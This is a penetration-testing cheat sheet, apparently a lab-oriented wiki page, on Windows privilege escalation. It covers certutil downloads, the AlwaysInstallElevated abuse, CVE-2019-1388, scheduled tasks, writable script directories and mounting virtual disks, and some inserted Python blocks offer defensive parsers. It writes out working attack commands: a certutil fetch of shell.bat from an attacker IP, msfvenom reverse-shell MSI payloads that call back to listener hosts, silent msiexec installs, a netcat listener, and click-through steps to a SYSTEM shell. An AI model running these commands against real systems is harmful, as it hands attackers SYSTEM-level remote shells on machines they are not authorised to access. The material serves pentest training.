# Miscellaneous Techniques

## Living Off The Land Binaries and Scripts (LOLBAS)

{% embed url="https://lolbas-project.github.io/" %}

### **Certutil**

#### Transfer Files

```powershell-session
PS C:\htb> certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat
```

#### Encode File

```cmd-session
C:\htb> certutil -encode file1 encodedfile

Input Length = 7
Output Length = 70
CertUtil: -encode command completed successfully
```

#### Decode File

```cmd-session
C:\htb> certutil -decode encodedfile file2

Input Length = 70
Output Length = 7
CertUtil: -decode command completed successfully.
```
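The layout `certutil -encode` produces (a base64 body wrapped at 64 characters between certificate-style header and footer lines, CRLF line endings) is why the 7-byte input above comes out at 70 bytes. The following Python, an added example that is not part of the original page, reproduces and reverses that layout and flags blobs that carry the certificate headers but do not decode to a DER certificate, which is how such files stand out during triage; the helper names are this example's own.

```python
import base64

# Fixed strings certutil -encode wraps around the base64 body.
HEADER = "-----BEGIN CERTIFICATE-----"
FOOTER = "-----END CERTIFICATE-----"
LINE_LEN = 64


def certutil_encode(data: bytes) -> bytes:
    """Reproduce certutil -encode: header, base64 wrapped at 64 chars, footer, CRLF endings."""
    b64 = base64.b64encode(data).decode("ascii")
    body = [b64[i:i + LINE_LEN] for i in range(0, len(b64), LINE_LEN)]
    return ("\r\n".join([HEADER, *body, FOOTER]) + "\r\n").encode("ascii")


def certutil_decode(blob: bytes) -> bytes:
    """Reverse the layout: require the header and footer lines, then decode the body strictly."""
    lines = [ln.strip() for ln in blob.decode("ascii").splitlines() if ln.strip()]
    if len(lines) < 2 or lines[0] != HEADER or lines[-1] != FOOTER:
        raise ValueError("not a certutil-encoded blob")
    return base64.b64decode("".join(lines[1:-1]), validate=True)


def looks_like_certutil_blob(blob: bytes) -> bool:
    """Triage heuristic (this example's own): certificate headers present, but the decoded
    payload does not start with the ASN.1 SEQUENCE tag (0x30) every DER certificate begins with."""
    try:
        payload = certutil_decode(blob)
    except (ValueError, UnicodeDecodeError):
        return False
    return not payload.startswith(b"\x30")


if __name__ == "__main__":
    # A constructed 7-byte input, matching the "Input Length = 7" run above: 27+2 header,
    # 12+2 body and 25+2 footer bytes give the 70-byte output certutil reports.
    encoded = certutil_encode(b"abcdefg")
    print(len(encoded), looks_like_certutil_blob(encoded))
```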

### Rundll32

A binary such as [rundll32.exe](https://lolbas-project.github.io/lolbas/Binaries/Rundll32/) can be used to execute a DLL file. We could use this to obtain a reverse shell by executing a .DLL file that we either download onto the remote host or host ourselves on an SMB share.

## Always Install Elevated

{% content-ref url="citrix-breakout" %}
[citrix-breakout](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/windows/citrix-breakout)
{% endcontent-ref %}

```powershell-session
PS C:\htb> reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
```

```powershell-session
PS C:\htb> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
```

```shell-session
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi
```

```cmd-session
C:\htb> msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart
```

```shell-session
nc -nlvp 9443
```

### PowerUp

```powershell-session
PS C:\Users\pmorgan\Desktop> Import-Module .\PowerUp.ps1
PS C:\Users\pmorgan\Desktop> Write-UserAddMSI

Output Path
-----------
UserAdd.msi
```

### Registry - AlwaysInstallElevated

1. Query the **registry for AlwaysInstallElevated** keys:\
   `reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`\
   `reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`\
   Note that both **keys are set to 1 (0x1).**
2. On Kali, generate a **reverse shell Windows Installer (reverse.msi)** using msfvenom. Update the LHOST IP address accordingly: `msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi`
3. Transfer the reverse.msi file to the C:\PrivEsc directory on Windows.
4. Start a listener on Kali and then **run the installer** to trigger a reverse shell running with SYSTEM privileges: `msiexec /quiet /qn /i C:\PrivEsc\reverse.msi`
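The two `reg query` outputs earlier in this section and step 1 above both come down to one audit decision: the policy is only effective when the HKCU and HKLM values are both 1. The following Python, an added example that is not part of the original page, parses `reg query` output in the layout shown above (the sample outputs are constructed, including the error text printed when the key does not exist) and returns that verdict; the function names are this example's own.

```python
import re
from typing import Optional

# Constructed samples in the layout reg query prints (not captured from a real host).
HKCU_OUTPUT = """
HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKLM_OUTPUT = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x0
"""
# What reg query prints when the policy key has never been created.
MISSING_OUTPUT = "ERROR: The system was unable to find the specified registry key or value."

# Matches the value line: name, REG_DWORD type, hexadecimal data.
VALUE_RE = re.compile(r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9A-Fa-f]+)\s*$", re.MULTILINE)


def parse_aie(reg_query_output: str) -> Optional[int]:
    """DWORD value of AlwaysInstallElevated in the output, or None when the value or key is absent."""
    match = VALUE_RE.search(reg_query_output)
    return int(match.group(1), 16) if match else None


def always_install_elevated(hkcu_output: str, hklm_output: str) -> bool:
    """The policy only takes effect when both the per-user (HKCU) and per-machine (HKLM) values are 1."""
    return parse_aie(hkcu_output) == 1 and parse_aie(hklm_output) == 1


def describe(hkcu_output: str, hklm_output: str) -> str:
    """One-line verdict for an audit report, showing both raw values (None = key/value missing)."""
    hkcu, hklm = parse_aie(hkcu_output), parse_aie(hklm_output)
    state = "ENABLED" if always_install_elevated(hkcu_output, hklm_output) else "not enabled"
    return f"AlwaysInstallElevated {state} (HKCU={hkcu}, HKLM={hklm})"


if __name__ == "__main__":
    print(describe(HKCU_OUTPUT, HKLM_OUTPUT))
    print(describe(HKCU_OUTPUT, MISSING_OUTPUT))
```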

## CVE-2019-1388

Vulnerable Windows Server and Workstation versions.

```
SERVER
======

Windows 2008r2	7601	** link OPENED AS SYSTEM **
Windows 2012r2	9600	** link OPENED AS SYSTEM **
Windows 2016	14393	** link OPENED AS SYSTEM **
Windows 2019	17763	link NOT opened


WORKSTATION
===========

Windows 7 SP1	7601	** link OPENED AS SYSTEM **
Windows 8		9200	** link OPENED AS SYSTEM **
Windows 8.1		9600	** link OPENED AS SYSTEM **
Windows 10 1511	10240	** link OPENED AS SYSTEM **
Windows 10 1607	14393	** link OPENED AS SYSTEM **
Windows 10 1703	15063	link NOT opened
Windows 10 1709	16299	link NOT opened
...
```

{% embed url="https://web.archive.org/web/20210620053630/https://gist.github.com/gentilkiwi/802c221c0731c06c22bb75650e884e5a" %}

Right-click on the `hhupd.exe` executable and select `Run as administrator` from the menu.

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FXJOsD3mw6NrCmzBz7T23%2Fimage.png?alt=media&#x26;token=bd3a78f8-ba1e-481d-a54b-9e9716b2bbf0" alt=""><figcaption></figcaption></figure>

Click on `Show information about the publisher's certificate` to open the certificate dialog. Here we can see that the `SpcSpAgencyInfo` field is populated in the Details tab.

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FuQucaaGIzxqkNiVR5JZT%2Fimage.png?alt=media&#x26;token=329654cd-8dd0-41bc-8120-032ada92934f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F4LeggP0sFRAgsxfazeut%2Fimage.png?alt=media&#x26;token=89a6a72b-a25e-438b-b28c-808fc05a1790" alt=""><figcaption></figcaption></figure>

Click on the hyperlink and then click `OK`. The certificate dialog will close and a browser window will launch.

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FQB2o1nc2ssm4AOz63WQr%2Fimage.png?alt=media&#x26;token=47f6e24c-30f7-4876-bc22-e7f4c5437c5d" alt=""><figcaption></figcaption></figure>

The browser instance was launched as SYSTEM.

Right-click anywhere on the web page and choose `View page source`. Once the page source opens in another tab, right-click again and select `Save as`, and a `Save As` dialog box will open.

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FndaVhrhmdhuB2rGIQCR1%2Fimage.png?alt=media&#x26;token=cfde312a-b84b-40bf-9569-ee60d4594e55" alt=""><figcaption></figcaption></figure>

Type `c:\windows\system32\cmd.exe` in the file path and hit enter. If all goes to plan, we will have a cmd.exe instance running as SYSTEM.

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FhuFX8ogFTPfHzeBlBEgn%2Fimage.png?alt=media&#x26;token=aa68f93b-96b6-4d47-b574-278cf3211787" alt=""><figcaption></figcaption></figure>

## Scheduled Tasks

{% embed url="https://github.com/jsecu/ModTask" %}

```cmd-session
C:\htb> schtasks /query /fo LIST /v
```

```powershell-session
PS C:\htb> Get-ScheduledTask | select TaskName,State
 
TaskName                                                State
--------                                                -----
.NET Framework NGEN v4.0.30319                          Ready
.NET Framework NGEN v4.0.30319 64                       Ready
.NET Framework NGEN v4.0.30319 64 Critical           Disabled
.NET Framework NGEN v4.0.30319 Critical              Disabled
AD RMS Rights Policy Template Management (Automated) Disabled
AD RMS Rights Policy Template Management (Manual)       Ready
PolicyConverter                                      Disabled
SmartScreenSpecific                                     Ready
VerifiedPublisherCertStoreCheck                      Disabled
Microsoft Compatibility Appraiser                       Ready
ProgramDataUpdater                                      Ready
StartupAppTask                                          Ready
appuriverifierdaily                                     Ready
appuriverifierinstall                                   Ready
CleanupTemporaryState                                   Ready
DsSvcCleanup                                            Ready
Pre-staged app cleanup                               Disabled

<SNIP>
```

## **Checking Permissions on C:\Scripts Directory**

```cmd-session
C:\htb> .\accesschk64.exe /accepteula -s -d C:\Scripts\
 
Accesschk v6.13 - Reports effective permissions for securable objects
Copyright © 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com
 
C:\Scripts
  RW BUILTIN\Users
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
```
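Reading `accesschk -s -d` output by eye works for one directory; across a tree the question is which directories grant write access to principals every interactive user belongs to, as `BUILTIN\Users` has on `C:\Scripts` above. The following Python, an added example that is not part of the original page, parses output in that layout (the sample is constructed, banner included) and reports those directories; the principal list and function names are this example's own assumptions.

```python
import re

# Constructed sample in the layout accesschk -s -d prints (not captured from a real host):
# the banner, then each directory followed by its effective-permission entries.
ACCESSCHK_OUTPUT = """\
Accesschk v6.13 - Reports effective permissions for securable objects
Copyright (C) 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\\Scripts
  RW BUILTIN\\Users
  RW NT AUTHORITY\\SYSTEM
  RW BUILTIN\\Administrators
C:\\Scripts\\prod
  R  BUILTIN\\Users
  RW NT AUTHORITY\\SYSTEM
  RW BUILTIN\\Administrators
"""

# Principals that any interactive user is a member of (assumed list); write access for them is the finding.
LOW_PRIV_PRINCIPALS = {
    "BUILTIN\\Users",
    "Everyone",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
}

PATH_RE = re.compile(r"^[A-Za-z]:\\")               # unindented line starting with a drive letter
ENTRY_RE = re.compile(r"^\s+(RW|R|W)\s+(.+?)\s*$")  # indented "RW <principal>" entry


def parse_accesschk(output: str) -> dict:
    """Map each directory to its (permission, principal) entries; banner and blank lines are skipped."""
    perms, current = {}, None
    for line in output.splitlines():
        if PATH_RE.match(line):
            current = line.strip()
            perms[current] = []
            continue
        entry = ENTRY_RE.match(line)
        if entry and current is not None:
            perms[current].append((entry.group(1), entry.group(2)))
    return perms


def writable_by_low_priv(output: str) -> dict:
    """Directories where a low-privilege principal holds write access, with the principals responsible."""
    findings = {}
    for path, entries in parse_accesschk(output).items():
        who = [p for perm, p in entries if "W" in perm and p in LOW_PRIV_PRINCIPALS]
        if who:
            findings[path] = who
    return findings
```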

## User/Computer Description Field

```powershell-session
PS C:\htb> Get-LocalUser
 
Name            Enabled Description
----            ------- -----------
Administrator   True    Built-in account for administering the computer/domain
DefaultAccount  False   A user account managed by the system.
Guest           False   Built-in account for guest access to the computer/domain
helpdesk        True
htb-student     True
htb-student_adm True
jordan          True
logger          True
sarah           True
sccm_svc        True
secsvc          True    Network scanner - do not change password
sql_dev         True
```

**Computer Description Field**

```powershell-session
PS C:\htb> Get-WmiObject -Class Win32_OperatingSystem | select Description
 
Description
-----------
The most vulnerable box ever!
```

## Mount VHDX/VMDK

Mounting `.vhd`, `.vhdx`, and `.vmdk` virtual disk files on Linux.

### **Mount VMDK on Linux**

```shell-session
guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk
```

### **Mount VHD/VHDX on Linux**

```shell-session
guestmount --add WEBSRV10.vhdx  --ro /mnt/vhdx/ -m /dev/sda1
```
